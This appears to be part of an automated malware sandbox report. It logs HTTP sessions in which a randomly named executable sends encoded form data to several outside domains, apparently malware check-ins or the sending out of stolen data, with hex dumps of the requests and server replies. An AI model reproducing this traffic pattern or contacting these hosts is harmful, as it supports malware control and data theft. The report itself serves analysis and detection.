                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:19.196017981 CEST1757OUTPOST /3osa/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.ie8mce.website
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.ie8mce.website
                                      Referer: http://www.ie8mce.website/3osa/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 4e 7a 6a 31 4e 6f 30 5a 54 2f 57 4b 30 6a 65 74 77 67 79 6a 6c 56 30 76 4e 6a 41 58 6b 65 52 53 75 35 53 59 53 38 78 72 49 6c 71 37 4d 51 45 43 38 41 38 78 50 37 6a 58 30 44 6e 38 2b 74 6f 39 72 32 48 75 43 30 39 53 54 41 68 64 6f 45 6d 70 62 32 38 50 76 62 4b 2b 78 41 78 37 4c 35 72 54 4a 7a 64 33 4e 61 69 59 58 4d 56 75 4e 74 61 6e 4c 76 2b 43 78 37 75 57 76 70 65 4a 45 37 56 57 51 55 69 5a 45 43 30 56 78 73 4a 33 4a 4f 71 50 49 74 4a 67 41 57 4a 5a 6f 7a 42 75 77 6b 41 74 42 73 36 42 2b 39 58 68 4f 50 4a 70 65 54 52 6a 7a 77 37 76 76 63 69 62 6d 73 4d 65 2f 53 53 6f 4e 63 76 33 35 34 52 31 70 48 50 78 65 44 6b 46 34 77 2f 44 79 47 79 43 2b 4a 2b 4c 61 68 42 6c 61 2b 69 67 6d 38 32 51 79 38 65 63 75 48 6d 78 75 77 49 2b 2f 79 55 2b 64 67 58 4f 62 52 71 6a 6b 70 75 7a 43 6f 71 49 66 6d 57 75 66 51 63 45 54 32 34 45 6d 51 4c 4e 48 65 56 73 34 6d 51 63 58 74 49 37 74 65 6f 69 7a 64 71 57 78 5a 6a 6a 5a 41 7a 54 50 37 6b 4c 35 7a 49 37 78 65 35 46 71 6a 75 75 42 6f 34 50 48 33 [TRUNCATED]
                                      Data Ascii: TTv82Lg=Nzj1No0ZT/WK0jetwgyjlV0vNjAXkeRSu5SYS8xrIlq7MQEC8A8xP7jX0Dn8+to9r2HuC09STAhdoEmpb28PvbK+xAx7L5rTJzd3NaiYXMVuNtanLv+Cx7uWvpeJE7VWQUiZEC0VxsJ3JOqPItJgAWJZozBuwkAtBs6B+9XhOPJpeTRjzw7vvcibmsMe/SSoNcv354R1pHPxeDkF4w/DyGyC+J+LahBla+igm82Qy8ecuHmxuwI+/yU+dgXObRqjkpuzCoqIfmWufQcET24EmQLNHeVs4mQcXtI7teoizdqWxZjjZAzTP7kL5zI7xe5FqjuuBo4PH39DWqE9mhXvmXAwo73RH8OXlQUX1ZCLkZvdAHwu8fhU6J7plYasOMp7oUrwX91esd9dbRe/CHOmWpdp8tQIYZ6vsRM0KkqN7WJ9MPqu10Psi80wmqdWnVkgnPst/A2enkgkPcZVwsrCEqFyImzZ2OEv2tzyUOcxbsr6dB1t9b3fyu8ByuD3Yg7+wmEoU97v6JdzILNLTFAhqWWYlAGjeAjH9KfmQu6yT9rB8mpmJLbOFekO6PKs7ShnMahAa2da9Ke5+/h0/0r9qeN/ix8r3dYHr/S3ClS7BkpUYlmk72THS5VHVDVnGJ8GcLwfNeBEF4KdLzThVxTXsuBUh7Nzqa9PPfMvF8nsIsrn0jSrAiq1HVePny/1bmsZ/RYfWnBoHYBRL5nyFPwheeJSbUUuRe1s8taTX2j75hVcGjtSOawrDgDJec+3FZqilBPKdwARJXQk7nTbsrxfh8rmf1f7uOKUvHJLxfnGZY5ffem9Dslqi/F0Sdzc3znB2HrZHoht6U+BXnQP3IqKCYteaauFWkAlRnYZJUIooSj0dj5ydVr+YwwQ4vqVeoIv8KgKfs9alUz0tlCECABU3dmrefGXgG8NxhBzF/24e29YrHpYIIxqFjNPyHzO/GLByvJJHueFrFyI/jVyfA5/GZpmhnJMeLmxBr5TZhHc69Dn [TRUNCATED]
                                      Jun 10, 2024 10:22:20.139576912 CEST570INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Mon, 10 Jun 2024 08:22:19 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Content-Encoding: gzip
                                      Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 51 4d 6f c2 30 0c bd f3 2b a2 9c 8a 34 12 a0 a3 65 a3 65 12 d2 ae 9c 76 43 68 0a 89 4b 5a 91 96 25 2e 1a 1b fb ef 73 f9 18 cb 21 b1 ad 67 bf e7 97 cc a2 db cd 7b 99 05 65 e6 3d 46 27 73 80 8a 69 ab 7c 00 cc 79 8b c5 60 ca 09 71 2e 5b c4 fd 00 3e da f2 90 73 0f 85 87 60 39 d3 4d 8d 50 13 76 28 46 33 d6 fa 5d de c1 c2 b3 94 5f 65 e5 5d 21 74 e3 a4 87 6d 19 10 3c 67 72 de d1 f4 58 16 b4 2f f7 c8 f0 b8 87 9c 23 7c a2 ac d4 41 5d aa 9c 05 af 73 7e 1b 54 05 d1 06 f0 41 4c 46 62 a7 e4 78 34 4d 93 f8 31 16 55 e0 f3 4c 5e 5a 48 e3 2d 38 28 cf de ad 43 96 5f 9e d3 89 ad d6 b3 5e 54 b4 b5 c6 b2 a9 a3 3e fb a6 65 3b 98 75 04 32 8d 6e 1d ad 20 b4 07 85 f0 ba 83 2e 8b f8 55 4b 7f 46 60 eb 04 49 22 f0 9f 28 aa 6c 54 69 da f3 7e 94 54 e1 25 99 24 93 d1 93 49 37 26 9e a8 b8 18 c7 71 0a 43 ad 13 9d 9a e9 d4 6c c6 bc 9b d4 d1 86 ff ac 5b c0 2b 65 58 1c df d4 76 a9 1c dc c9 57 c3 f5 8c ec 62 41 ec 95 27 59 cb c6 80 28 6b b2 03 17 50 34 1e 22 eb 1e 58 20 91 3f fd 88 ee bb [TRUNCATED]
                                      Data Ascii: 161MQMo0+4eevChKZ%.s!g{e=F'si|y`q.[>s`9MPv(F3]_e]!tm<grX/#|A]s~TALFbx4M1UL^ZH-8(C_^T>e;u2n .UKF`I"(lTi~T%$I7&qCl[+eXvWbA'Y(kP4"X ?ns$chv0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      24192.168.2.551390176.113.70.180802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:21.730110884 CEST457OUTGET /3osa/?kH=00U8ENLHk&TTv82Lg=AxLVOe86WIqquROk4wW2qAARSAB2s4BJoZSnRO1SGEf+ewBgrgY/U4+QoHX9+oVsrlzSfgcLZGl64XyGJnoqgpfIm3dacYKZHld6caimAIQJPM6fBdCSw8qvz7rbMrI9Lg== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.ie8mce.website
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:22:22.838048935 CEST686INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Mon, 10 Jun 2024 08:22:22 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Data Raw: 31 65 64 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 2e 31 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 7a 69 6a 72 6d 66 2e 63 6f 6d 2f 72 65 67 69 73 74 65 72 22 20 2f 3e 20 20 20 20 0a 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6a 73 2e 75 73 65 72 73 2e 35 31 2e 6c 61 2f 32 31 38 37 36 33 34 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a [TRUNCATED]
                                      Data Ascii: 1ed<html><head> <meta charset="utf-8"><meta http-equiv="refresh" content="0.1; url=https://zijrmf.com/register" /> <script type="text/javascript" src="https://js.users.51.la/21876343.js"></script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?656519d7bd35a3f2337e0cc6c7d88db2"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></body></html>0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      25192.168.2.551391101.36.121.143802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:28.451299906 CEST717OUTPOST /5965/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.shrongcen.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.shrongcen.com
                                      Referer: http://www.shrongcen.com/5965/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 77 68 34 34 41 45 6e 30 4a 56 71 4d 4e 30 58 66 74 6f 72 63 55 6f 49 36 6e 6e 76 77 72 70 47 70 4b 78 33 77 62 70 4c 59 35 4a 4b 53 62 50 67 51 4c 4f 66 70 43 44 75 31 38 62 33 7a 38 47 70 33 79 5a 68 44 68 67 62 77 5a 34 52 76 35 4a 76 6a 58 59 68 49 61 74 5a 50 56 6a 39 4f 35 74 34 70 45 62 62 4f 32 6d 48 56 4c 58 4a 70 5a 70 5a 4a 69 6e 6f 48 6b 69 57 69 42 41 31 32 45 49 6a 6e 58 73 36 38 76 35 59 38 6f 75 61 31 6c 74 64 4b 56 61 67 42 4c 56 69 30 31 30 44 47 55 6e 49 4b 6d 4d 45 39 32 59 51 6a 68 4e 48 30 7a 4e 47 33 6f 7a 70 61 6c 4e 53 48 55 77 38 5a 75 57 52 6f 30 54 42 41 4e 2f 6b 3d
                                      Data Ascii: TTv82Lg=wh44AEn0JVqMN0XftorcUoI6nnvwrpGpKx3wbpLY5JKSbPgQLOfpCDu18b3z8Gp3yZhDhgbwZ4Rv5JvjXYhIatZPVj9O5t4pEbbO2mHVLXJpZpZJinoHkiWiBA12EIjnXs68v5Y8oua1ltdKVagBLVi010DGUnIKmME92YQjhNH0zNG3ozpalNSHUw8ZuWRo0TBAN/k=
                                      Jun 10, 2024 10:22:29.399543047 CEST318INHTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 10 Jun 2024 08:22:29 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 153
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.551392101.36.121.143802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:30.992815971 CEST737OUTPOST /5965/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.shrongcen.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.shrongcen.com
                                      Referer: http://www.shrongcen.com/5965/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 77 68 34 34 41 45 6e 30 4a 56 71 4d 50 56 6e 66 69 72 44 63 46 34 49 37 6f 48 76 77 39 5a 47 6c 4b 78 7a 77 62 6f 50 49 2b 37 65 53 63 72 6b 51 4b 50 66 70 42 44 75 31 6b 4c 32 33 34 47 70 47 79 5a 74 78 68 68 6e 77 5a 34 46 76 35 4e 6e 6a 58 76 31 48 62 39 5a 4e 42 54 39 4d 39 74 34 70 45 62 62 4f 32 6d 53 4f 4c 58 52 70 5a 36 42 4a 6a 44 38 45 71 43 57 68 57 77 31 32 41 49 6a 6a 58 73 37 62 76 34 45 47 6f 73 79 31 6c 73 74 4b 55 4c 67 43 53 46 69 32 6f 6b 43 54 51 48 74 47 2f 4d 55 42 31 72 4a 2b 30 76 58 75 37 62 72 64 79 52 68 79 32 74 2b 2f 45 6a 30 75 2f 6d 77 42 75 77 52 77 54 6f 7a 65 34 33 48 31 70 5a 7a 61 41 73 6f 69 56 76 4a 48 61 77 30 36
                                      Data Ascii: TTv82Lg=wh44AEn0JVqMPVnfirDcF4I7oHvw9ZGlKxzwboPI+7eScrkQKPfpBDu1kL234GpGyZtxhhnwZ4Fv5NnjXv1Hb9ZNBT9M9t4pEbbO2mSOLXRpZ6BJjD8EqCWhWw12AIjjXs7bv4EGosy1lstKULgCSFi2okCTQHtG/MUB1rJ+0vXu7brdyRhy2t+/Ej0u/mwBuwRwToze43H1pZzaAsoiVvJHaw06
                                      Jun 10, 2024 10:22:31.972712994 CEST318INHTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 10 Jun 2024 08:22:31 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 153
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.551393101.36.121.143802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:33.525440931 CEST1754OUTPOST /5965/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.shrongcen.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.shrongcen.com
                                      Referer: http://www.shrongcen.com/5965/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 77 68 34 34 41 45 6e 30 4a 56 71 4d 50 56 6e 66 69 72 44 63 46 34 49 37 6f 48 76 77 39 5a 47 6c 4b 78 7a 77 62 6f 50 49 2b 37 6d 53 62 65 77 51 4b 73 33 70 41 44 75 31 36 62 32 36 34 47 70 62 79 61 64 50 68 68 71 4e 5a 37 39 76 72 36 6e 6a 56 64 4e 48 56 39 5a 4e 65 44 39 50 35 74 34 38 45 62 4c 52 32 6d 43 4f 4c 58 52 70 5a 37 78 4a 6b 58 6f 45 6f 43 57 69 42 41 31 36 45 49 69 38 58 73 69 6b 76 34 51 57 39 4e 53 31 6c 4d 39 4b 58 35 49 43 4e 56 69 6f 72 6b 44 51 51 48 51 45 2f 4d 4a 74 31 6f 56 55 30 74 33 75 6f 39 43 31 71 7a 52 36 76 2f 61 50 49 41 4e 4d 68 52 55 6b 67 47 56 30 50 6f 75 6b 30 58 72 4b 73 70 62 6e 55 2b 35 6c 50 4a 35 63 49 51 4e 30 67 66 41 69 37 6c 36 2b 7a 51 30 42 66 72 69 4d 63 44 42 7a 68 6f 72 2f 55 6d 5a 36 32 52 38 69 6d 69 69 42 38 45 43 36 4b 45 4a 44 65 57 48 54 5a 77 2b 6d 31 6c 4e 57 44 6f 7a 32 6b 76 62 47 36 37 5a 63 44 61 43 72 79 32 66 5a 66 64 41 57 56 7a 59 61 43 34 64 6c 34 69 37 34 56 55 37 78 72 4e 77 6c 68 69 49 4f 4b 77 5a 57 42 46 [TRUNCATED]
                                      Data Ascii: TTv82Lg=wh44AEn0JVqMPVnfirDcF4I7oHvw9ZGlKxzwboPI+7mSbewQKs3pADu16b264GpbyadPhhqNZ79vr6njVdNHV9ZNeD9P5t48EbLR2mCOLXRpZ7xJkXoEoCWiBA16EIi8Xsikv4QW9NS1lM9KX5ICNViorkDQQHQE/MJt1oVU0t3uo9C1qzR6v/aPIANMhRUkgGV0Pouk0XrKspbnU+5lPJ5cIQN0gfAi7l6+zQ0BfriMcDBzhor/UmZ62R8imiiB8EC6KEJDeWHTZw+m1lNWDoz2kvbG67ZcDaCry2fZfdAWVzYaC4dl4i74VU7xrNwlhiIOKwZWBF8ADoWRPyjFtKgOd2+B9MuK4s5P+6ev9Pnu0an/UhSfgnk7zcxO0r8nus+bCzOIQX2J7Nes8w51eGqr6jW3ycoOgCoMyKsidAg3JhGIhubDlkx7zcSuWoiu69WuQBMGFFI7tOmZZrbbmpD8lxPN7DMKSuBycBZnQ+RtT2L2ddVS1hCAnoafmoCOmv8EVQLijqs7Jq/ynZCTFjG8h6lym5t3D8EHGI+dFkuCyrzznqf3smYn33SKbWKnfHutY68pcd0/EaZ6s6MoZU6do41T2QcGG9Vtn2//yCLrhmzAtlhQnvhzqC2owEf0LYLiQBZC1fJI9Ise2y2J+54lxwnLzuvELy+4Kzf3QD6UjC+HQMeUD/Xux9F4UUZtLblI6dctYu+fNY2uLv1kUfTQN+JoGqegU8dj81xqlvE0/7QXM+Zc4HJH1ZiADWN2qwcvJDiCCxrIJ7s3Zj3OVp+VwByqhyJNeo/oo5dsAJ4Amw1tArnFyXXOOicNdORuD6j1HKdq116L37Xe/sbFSz0X219YltfS/vpKu3+QG2MVQ2dDR4EE+ey6/3+xJZAlgYzf0t4rBnlAG1mYKzNnuc9T0T12kut/jSorggIOBLtgbUgGmxsZ9YdDrw3PuzAJLv1QmjSHiuYQZx7JB9z5Iiv3sTmNRzc9d0GQmID5Lnb8 [TRUNCATED]
                                      Jun 10, 2024 10:22:34.494849920 CEST318INHTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 10 Jun 2024 08:22:34 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 153
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      28192.168.2.551394101.36.121.143802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:36.059393883 CEST456OUTGET /5965/?TTv82Lg=9jQYDwKIZi6/W0GvqqOWctdn1nDe86qQU37QFI3e35aKJbsuGODGFib0m7CCxXxx0blg9Tj0Vv9f5L3iX8JxT+4MBVsytoUBFOmu7GzeNBgPNO5fqFAxhyq0WiRZHbK4BA==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.shrongcen.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:22:37.554281950 CEST318INHTTP/1.1 404 Not Found
                                      Server: nginx/1.20.1
                                      Date: Mon, 10 Jun 2024 08:22:36 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 153
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      29192.168.2.551395103.138.88.32802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:22:43.665865898 CEST720OUTPOST /gwqo/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.skyinftech.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.skyinftech.com
                                      Referer: http://www.skyinftech.com/gwqo/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 6c 6d 76 39 74 66 31 6a 43 58 51 47 6c 2b 56 72 53 57 70 5a 65 6c 57 32 62 53 6b 57 75 6e 75 76 48 63 34 68 56 6c 53 37 63 72 59 62 70 58 4f 61 2b 76 64 57 74 4d 7a 67 53 77 30 46 54 71 6b 77 69 4a 47 33 31 2f 6c 41 46 62 66 4d 2f 46 57 79 54 76 78 55 68 6a 53 41 64 32 50 34 73 47 37 6a 52 4d 53 76 49 2f 75 46 30 2b 72 55 57 74 64 49 71 44 54 6e 70 68 2b 30 58 73 6d 34 58 4d 65 54 34 78 49 50 6f 37 31 31 6b 42 68 41 35 79 51 6b 41 54 41 62 38 35 6c 36 41 2b 51 31 37 49 53 49 5a 73 65 4e 31 66 46 69 38 4e 4c 65 35 32 4c 31 57 44 53 50 75 6d 6b 63 56 55 52 45 57 2f 78 49 6a 65 31 6e 4b 4f 59 3d
                                      Data Ascii: TTv82Lg=lmv9tf1jCXQGl+VrSWpZelW2bSkWunuvHc4hVlS7crYbpXOa+vdWtMzgSw0FTqkwiJG31/lAFbfM/FWyTvxUhjSAd2P4sG7jRMSvI/uF0+rUWtdIqDTnph+0Xsm4XMeT4xIPo711kBhA5yQkATAb85l6A+Q17ISIZseN1fFi8NLe52L1WDSPumkcVUREW/xIje1nKOY=
                                      Jun 10, 2024 10:22:44.669698000 CEST1236INHTTP/1.1 404 Not Found
                                      Connection: close
                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                      pragma: no-cache
                                      content-type: text/html
                                      content-length: 1238
                                      date: Mon, 10 Jun 2024 08:22:42 GMT
                                      server: LiteSpeed
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
